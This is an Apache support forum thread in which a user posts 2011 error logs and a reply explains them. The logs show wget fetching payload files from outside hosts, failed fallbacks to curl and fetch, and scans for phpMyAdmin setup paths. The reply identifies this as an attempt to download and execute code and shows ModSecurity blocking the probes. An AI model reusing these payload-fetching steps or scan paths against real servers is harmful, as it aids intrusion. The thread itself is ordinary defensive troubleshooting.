Apache Friends Support Forum

[rewesh]

Please can someone take a look @ that log and explain to me if the server sending the file or receiving and how to stop this. Apache version 2.2.3

Code: Select all

[Mon Jan 17 22:51:44 2011] [error] [client 72.167.45.95] File does not exist: /var/www/MyAdmin
--22:52:08--  http://sicily.100free.com/max.txt
           => `max.txt'
Resolving sicily.100free.com... 205.134.160.74, 205.134.160.58
Connecting to sicily.100free.com|205.134.160.74|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,009 (27K) [text/plain]

    0K .......... .......... .......                         100%  120.53 KB/s

22:52:08 (120.53 KB/s) - `max.txt' saved [28009/28009]

sh: lwp-downlod: command not found
sh: fetch: command not found
sh: curl: command not found
[Tue Jan 18 04:40:44 2011] [error] [client 65.52.49.75] File does not exist: /var/www/robots.txt
--04:48:47--  http://lordmax.100free.com/a
           => `a'
Resolving lordmax.100free.com... 205.134.160.58, 205.134.160.74
Connecting to lordmax.100free.com|205.134.160.58|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,986 (28K) [text/plain]

    0K .......... .......... ........                        100%  109.62 KB/s

04:48:47 (109.62 KB/s) - `a' saved [28986/28986]

sh: curl: command not found
sh: fetch: command not found
sh: lwp-download: command not found
sh: /dev/nul: Permission denied
sh: /dev/nul: Permission denied
[Tue Jan 18 07:44:03 2011] [error] [client 121.8.101.138] File does not exist: /var/www/manager
[Tue Jan 18 11:59:09 2011] [error] [client 85.10.128.125] File does not exist: /var/www/scripts
[Tue Jan 18 11:59:09 2011] [error] [client 85.10.128.125] File does not exist: /var/www/phpMyAdmin
[Tue Jan 18 11:59:09 2011] [error] [client 85.10.128.125] File does not exist: /var/www/pma
[Tue Jan 18 11:59:09 2011] [error] [client 85.10.128.125] File does not exist: /var/www/mysql
[Tue Jan 18 11:59:10 2011] [error] [client 85.10.128.125] File does not exist: /var/www/scripts, referer:

[Tue Jan 18 11:59:10 2011] [error] [client 85.10.128.125] File does not exist: /var/www/phpMyAdmin, referer:
[Tue Jan 18 11:59:10 2011] [error] [client 85.10.128.125] File does not exist: /var/www/pma, referer:
[Tue Jan 18 11:59:10 2011] [error] [client 85.10.128.125] File does not exist: /var/www/mysql, referer:


[aser]

I suggest you to install mod_security for apache as soon as possible.
Your server is receiving the file and trying to execute it.
Download and take a look to http://sicily.100free.com/max.txt
Hacking attempts, here are my logs from today:

[Thu Jan 20 01:29:30 2011] [error] [client 85.10.128.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/apache2/conf.d/mod_security/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "97"] [id "960017"] [rev "2.1.1"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"] [uri "/pma2005/scripts/setup.php"] [unique_id "TTeB6ljGbecAABukdz4AAAA3"]
[Thu Jan 20 01:29:30 2011] [error] [client 85.10.128.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/apache2/conf.d/mod_security/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "97"] [id "960017"] [rev "2.1.1"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"] [uri "/phpmanager/scripts/setup.php"] [unique_id "TTeB6ljGbecAABtxSkMAAAAE"]
[Thu Jan 20 01:29:30 2011] [error] [client 85.10.128.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/apache2/conf.d/mod_security/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "97"] [id "960017"] [rev "2.1.1"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"][uri "/php-myadmin/scripts/setup.php"] [unique_id "TTeB6ljGbecAABuld4MAAAA4"]
[Thu Jan 20 01:29:30 2011] [error] [client 85.10.128.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/apache2/conf.d/mod_security/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "97"] [id "960017"] [rev "2.1.1"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"] [uri "/phpmy-admin/scripts/setup.php"] [unique_id "TTeB6ljGbecAABumd70AAAA5"]
[Thu Jan 20 01:29:30 2011] [error] [client 85.10.128.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/apache2/conf.d/mod_security/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "97"] [id "960017"] [rev "2.1.1"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"] [uri "/webadmin/scripts/setup.php"] [unique_id "TTeB6ljGbecAABuneXYAAAA6"]
[Thu Jan 20 01:29:30 2011] [error] [client 85.10.128.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/apache2/conf.d/mod_security/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "97"] [id "960017"] [rev "2.1.1"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"] [uri "/sqlweb/scripts/setup.php"] [unique_id "TTeB6ljGbecAABuoeagAAAA7"]
[Thu Jan 20 01:29:30 2011] [error] [client 85.10.128.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/apache2/conf.d/mod_security/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "97"] [id "960017"] [rev "2.1.1"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"] [uri "/websql/scripts/setup.php"] [unique_id "TTeB6ljGbecAABupezEAAAA8"]
[Thu Jan 20 01:29:30 2011] [error] [client 85.10.128.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/apache2/conf.d/mod_security/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "97"] [id "960017"] [rev "2.1.1"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"] [uri "/webdb/scripts/setup.php"] [unique_id "TTeB6ljGbecAABuqe2AAAAA9"]
[Thu Jan 20 01:29:30 2011] [error] [client 85.10.128.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/apache2/conf.d/mod_security/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "97"] [id "960017"] [rev "2.1.1"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"] [uri "/mysqladmin/scripts/setup.php"] [unique_id "TTeB6ljGbecAABuse5YAAAA-"]
[Thu Jan 20 01:29:30 2011] [error] [client 85.10.128.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^[\\d.:]+$" at REQUEST_HEADERS:Host. [file "/etc/apache2/conf.d/mod_security/base_rules/modsecurity_crs_21_protocol_anomalies.conf"] [line "97"] [id "960017"] [rev "2.1.1"] [msg "Host header is a numeric IP address"] [severity "CRITICAL"] [tag "PROTOCOL_VIOLATION/IP_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [tag "http://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx"] [uri "/mysql-admin/scripts/setup.php"] [unique_id "TTeB6ljGbecAABuRaDIAAAAk"]